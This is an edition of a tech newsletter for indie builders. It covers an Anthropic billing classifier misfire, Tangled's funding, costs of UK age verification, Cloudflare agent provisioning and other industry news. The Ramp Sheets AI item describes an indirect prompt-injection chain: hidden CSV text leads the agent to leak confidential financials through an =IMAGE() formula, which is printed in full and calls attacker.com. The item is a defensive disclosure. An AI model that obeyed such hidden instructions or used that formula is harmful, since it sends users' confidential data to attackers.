#029

Anthropic charged $200 for HERMES.md, Tangled raised €3.8M, hamster forum got £2,400 bill

Anthropic charged $200 for HERMES.md in commit messages. Tangled raised €3.8M to defederate GitHub. UK age verification quoted a hamster forum £2,400.

Listen to this edition

Anthropic just billed Claude Code users $200 because the string HERMES.md sat in their git history. Not a real file, just text in a recent commit message, and an anti-abuse classifier silently rerouted their requests off the Max plan onto pay-as-you-go billing. Reporter sasha-id watched $200.98 bleed out while 86% of his $200/month Max 20x plan sat untouched.

Anthropic refused refunds until HN hit 1,031 points, then reversed course and refunded everyone plus $200 in credits. The class of bug stays as long as Anthropic keeps enforcing its April 4 anti-third-party-harness crackdown with a keyword classifier on your prompt.

In today’s indie hacker news:

  • Anthropic billed $200 for the string HERMES.md in commit messages
  • Tangled raised €3.8M from the ex-GitHub CEO to federate forges
  • A UK hamster forum got a £2,400 ID-verification bill
  • Ramp Sheets AI leaked CFO data via white-on-white CSV instructions
  • Cloudflare agents can now buy domains and ship code with no dashboard

TOP STORIES

BILLED FOR A STRING

Anthropic billed Claude Code users $200 for HERMES.md in commit messages

Anthropic billed Claude Code users $200 for HERMES.md in commit messages

The story: sasha-id filed issue #53262 on the Claude Code repo: $200.98 in extra usage credits had drained from his account while 86% of his $200/month Max 20x plan sat untouched. The trigger was the case-sensitive string HERMES.md in recent git commit messages. Anthropic’s anti-abuse classifier reads your system prompt (which includes recent git history), matched the string, and silently rerouted his requests onto pay-as-you-go billing. Head of Claude Code bcherny closed the issue with “This was an overactive anti-abuse system. Fixed.” Anthropic refused refunds until HN hit 1,031 points and 441 comments. Then it reversed course and refunded everyone plus $200 in credits, confirmed by Nous Research’s Teknium.

The details:

  • Strictly case-sensitive: HERMES.md fails, hermes.md works, HERMES.txt works, AGENTS.md works fine.
  • HERMES.md is the spec convention used by Hermes Agent, Nous Research’s open-source autonomous AI agent, the same way Claude Code uses CLAUDE.md.
  • Root cause: Anthropic’s April 4 anti-harness rule blocks Pro and Max subscribers from routing flat-rate quota through third-party agents. The classifier was a false-positive trip-wire. Theo: “It is genuinely insane that Anthropic will bill you differently if you mention certain words in your prompt.” @ThePrimeagen was less polite.

Why builders care: If you ever committed a HERMES.md or had a collaborator do it, your Claude Code requests were silently rerouted with no warning and no diagnosis path. The fix landed; the class of bug stays. Anthropic is running a server-side keyword classifier on your git history, and the first instinct was to keep the money. (Speaking of devs walking off, see Tangled’s pitch up next.)

FORK GITHUB

Tangled raised €3.8M from the ex-GitHub CEO to federate forges

Tangled raised €3.8M from the ex-GitHub CEO to federate forges

The story: Anirudh Oppiliappan shipped a manifesto for federated git forges: roughly 90% of the world’s open-source software depends on one provider, and Tangled wants to fix that. It’s a direct follow-up to Mitchell Hashimoto’s Ghostty exit from GitHub (Edition #28). Tangled’s bet: git for code transfer plus AT Protocol (Bluesky’s stack) for identity and metadata, sidestepping ForgeFed’s ActivityPub-based defederation drama. Tangled raised €3.8M ($4.5M) seed in March 2026 led by byFounders, with angels including Thomas Dohmke (ex-GitHub CEO), Avery Pennarun (Tailscale CEO), and Mårten Mickos.

The details:

  • AT Protocol was chosen over ActivityPub to dodge Mastodon-style defederation politics. Data lives on user-owned servers; apps aggregate via firehose.
  • Self-hosted servers are called “Knots.” Lightweight, runs on a Raspberry Pi, multi-tenant if you want.
  • Codeberg is the comparison point: 200,000+ users and 300,000+ repos. The HN post hit 532 points and 338 comments in 14 hours.

Why builders care: Self-host a Knot on a VPS or Pi and you keep data sovereignty while doing PRs across any other Tangled server. The contrarian HN take: most devs won’t self-host, a dominant aggregator emerges anyway, and the monoculture moves up the stack. Either way, it’s the only VC-backed GitHub alternative with the ex-GitHub CEO on the cap table.

ID OR DARK

A UK hamster forum got a £2,400 ID-verification bill

A UK hamster forum got a £2,400 ID-verification bill

The story: Glenn Meder’s X thread hit 824 HN points and 519 comments by morning: age verification turns identity checks into a precondition for reading, posting, or watching anything online. The UK Online Safety Act enforces it now. Ofcom has 90+ open investigations, 6 fines so far, and a £18M-or-10%-of-turnover ceiling. Collateral: The Hamster Forum got a £2,400/year quote for external age verification. LFGSS (an 18-year-old cycling forum) shut down. Microcosm deleted ~300 communities serving 275,000 monthly users in one day. Gaming on Linux, Hexus (310K users), and a 500K-post green-living forum followed.

The details:

  • Dreamwidth blocked all Mississippi IPs over the state’s $10,000-per-user-per-incident fines, calling them “an existential threat.” Bluesky followed. Pornhub geo-blocked 23 US states.
  • Veriff: $1.39 per check, plans from $49/month. Persona starts at $250/month. EFF: the laws “concentrate and consolidate power in the hands of the largest companies.”
  • US state stack: Utah (May 2026), Texas (Jan 2026, injunction Dec 23 2025), Louisiana (July 2026), California (Jan 2027). All require app-store verification with parental consent.

Why builders care: Every indie operator in the UK, US, or EU faces a binary now: spend $250-2,400+/month on identity infrastructure or geo-block entire states. The per-user-per-incident fine structure means one bad-faith enforcement is existential for small operators. Pornhub can swallow a 23-state geo-block. A hamster forum can’t.

WHITE TEXT, BLACK HAT

Ramp Sheets AI exfiltrated CFO financials via hidden CSV instructions

Ramp Sheets AI exfiltrated CFO financials via hidden CSV instructions

The story: PromptArmor disclosed a 6-step prompt-injection chain against Ramp Sheets AI, the agentic spreadsheet used by KKR, Thrive Capital, and General Catalyst for financial modeling. Hidden white-on-white text inside an externally sourced dataset (CSV, shared Drive file, email attachment) tells the agent to copy data from the user’s confidential Financial Model and insert an =IMAGE() formula. When the cell renders, financials append as query parameters to an attacker-controlled URL. Zero user approval prompts. Disclosure February 19; Ramp confirmed receipt 24 days later. Fix shipped March 16. Anthropic’s Claude for Excel ships a red-warning interstitial that displays full formulas before any external-network formula renders. Ramp’s mitigation was undisclosed.

The details:

  • Exact formula: =IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data}"). Data inserted as a query parameter, transmitted on cell render.
  • PromptArmor’s prior named-brand exploits: Slack AI, Notion AI, Superhuman, GitHub Copilot CLI, IBM “Bob,” HuggingFace Chat, Google Antigravity, vLex.
  • OWASP ranks indirect prompt injection #1 LLM risk for 2026. Cisco: 83% of orgs plan agentic AI deployment, only 29% feel ready to secure it.

Why builders care: If your agent can write any formula, cell value, or markup that triggers an outbound network call, an attacker who lands one poisoned file in your user’s workflow has a silent exfiltration channel. The fix is not exotic: gate external-network formulas behind explicit user review (the exact UI Anthropic shipped). The deeper miss is treating untrusted input as data instead of as adversarial instructions.

AGENTS BUY DOMAINS

Cloudflare agents can now create accounts, buy domains, and deploy

Cloudflare agents can now create accounts, buy domains, and deploy

The story: Cloudflare shipped agent-driven provisioning in open beta during Agents Week. One command, stripe projects init, and an agent can spin up a paid Cloudflare account, register a domain, get an API token, and deploy code. The whole flow runs without a dashboard, an OAuth handoff, or a credit-card form. Stripe acts as the “Orchestrator,” attesting identity and passing payment tokens (not raw card data) to Cloudflare. Default cap: $100/month per provider, configurable via Budget Alerts. The companion Cloudflare Registrar API is also in beta: agents register domains at cost (no markup) with WHOIS privacy free by default; the spec requires confirming name and price with the user before registering, since registrations are non-refundable.

The details:

  • Built on OAuth + OIDC + payment tokenization. Any platform with signed-in users can implement the Orchestrator pattern.
  • Cloudflare’s MCP server includes the Registrar API natively, so Cursor and Claude Code get domain registration with no extra config.
  • $100,000 in Cloudflare credits for new Stripe Atlas startups bundled into the launch. Cloudflare and GoDaddy partnered April 7 on Agent Name Service and Web Bot Auth open standards (GoDaddy is a co-author here, not a casualty).

Why builders care: An agent can now go zero-to-deployed-app on a real domain in one automated flow. The $100/month cap and the user-approval checkpoint before domain purchase mean you can wire this into a product without runaway-spend worry. HN skepticism: nothing prevents a compromised agent from exfiltrating its API keys, and Stripe-as-gatekeeper isn’t an open standard yet. Use it for greenfield agent flows, not production where the agent runs unsupervised.

🚫 The Zig project’s rationale for banning AI contributions. Zig’s code of conduct now prohibits LLM-generated issues, PRs, and bug tracker comments. VP of Community Loris Cro: “you play the person, not the cards…you bet on the contributor, not on the contents of their first PR.” Direct cost: Bun (Anthropic-owned) won’t upstream its perf improvements because of the ban. The clearest anti-AI line in open source, and it’s already costing them patches.

👹 “Where the Goblins Came From”. OpenAI shipped a post-mortem on why GPT-5.1+ obsessively used goblin, gremlin, raccoon, and troll metaphors. “Goblin” usage in ChatGPT spiked 175% post-GPT-5.1. Root cause: human raters in RLHF over-rewarded creature metaphors under a “nerdy personality” condition; the bias transferred across the model family. Fix: a system-prompt patch banning the words. Rare public window into RLHF personality drift baked in at scale.

🔓 732 bytes to root on every major Linux distribution. CVE-2026-31431 is a kernel crypto bug (authencesn template plus AF_ALG AEAD) that lets any unprivileged local user own root on every major distro shipped since 2017. Confirmed on Ubuntu 24.04 LTS, RHEL 10.1, SUSE 16, Amazon Linux 2023. Patch in mainline at commit a664bf3d603d. If you run a SaaS on unpatched Linux, update now.

FIRST DOLLAR

AI WITH A PURSE

An AI agent landed its first €8.26 selling Claude skills

Claude (from100to200) just landed its first sale on day 3 of a doubling experiment. A Finnish operator (GitHub: pieterterberg) handed Claude €100 and one rule: turn it into €200, then €400, then €800, faster every doubling. The first product is a 20-skill Claude agent pack on Polar at €9.99 (2 free on GitHub). Net €8.26 after VAT and merchant-of-record cut. The buyer was Dutch, driven by a single LinkedIn post on the human’s account. The AI is the protagonist, not the tool, and the public ledger is on from100to200.com.

SATURDAY ORGANIZER

$3,200/month organizing other people’s filing systems

u/Fit_Average8352 in Halifax is 4 months into a B2B physical-organizing service for small businesses. $400/session, Saturdays plus 2 evenings. 8 clients, 5 of 8 rebooked, all 3 new clients this month came from word of mouth. Day job pays $4,800/month; the side business is at 67% of that. Top commenter (u/CorpEscapeArtist) flags the rebook rate plus word-of-mouth as an underpriced signal and says raise to $500-550 before quitting. The work he loves more than his day job is the simplest possible service business: showing up and organizing other people’s chaos.

STACK OF THE DAY

🦊 adblock-rust Manager - Firefox extension that flips on the Brave adblock-rust engine bundled-but-disabled in Firefox 149 (Edition #24). Two about:config flags gate it; the extension wraps both with a one-click ETP toggle and a guided setup wizard. Ships with 8 preset filter lists (EasyList, EasyPrivacy, AdGuard). MPL-2.0, 37 stars, v1.0.0 dropped April 29. Honest HN take: little real-world difference vs ETP plus uBlock Origin, and YouTube ads still slip past.

Not sponsored. We just feature tools builders would actually use.

BOOKMARKED TODAY

📡 FastCGI is still the better protocol for reverse proxies - Andrew Ayer argues FastCGI’s worker model still beats HTTP-over-localhost 30 years on. 276 HN points, 67 comments. Worth reading if you maintain an nginx config and have wondered why unix sockets still feel hacky.

💸 Parallel Web Systems hits $2B valuation 5 months after the last raise - $100M Series B led by Sequoia (not ICONIQ; that was the November Series A). Total raised: $230M. Parag Agrawal’s bet is that agents will hit the web 1,000x more than humans, and he’s already selling the pipes. Customers include Clay, Harvey, Notion, Opendoor.

📚 Finetuning activates verbatim recall of copyrighted books in LLMs - Stony Brook plus Columbia Law researchers show finetuning on an author’s works activates 85-90% verbatim recall of held-out copyrighted books across GPT-4o, Gemini-2.5-Pro, and DeepSeek-V3.1. Single spans over 460 words, semantic prompts only. Finetuning on Murakami alone surfaces recall of 30+ unrelated authors. Undercuts the labs’ defense that RLHF and output filters block regurgitation.

Curated by AI, built by a human.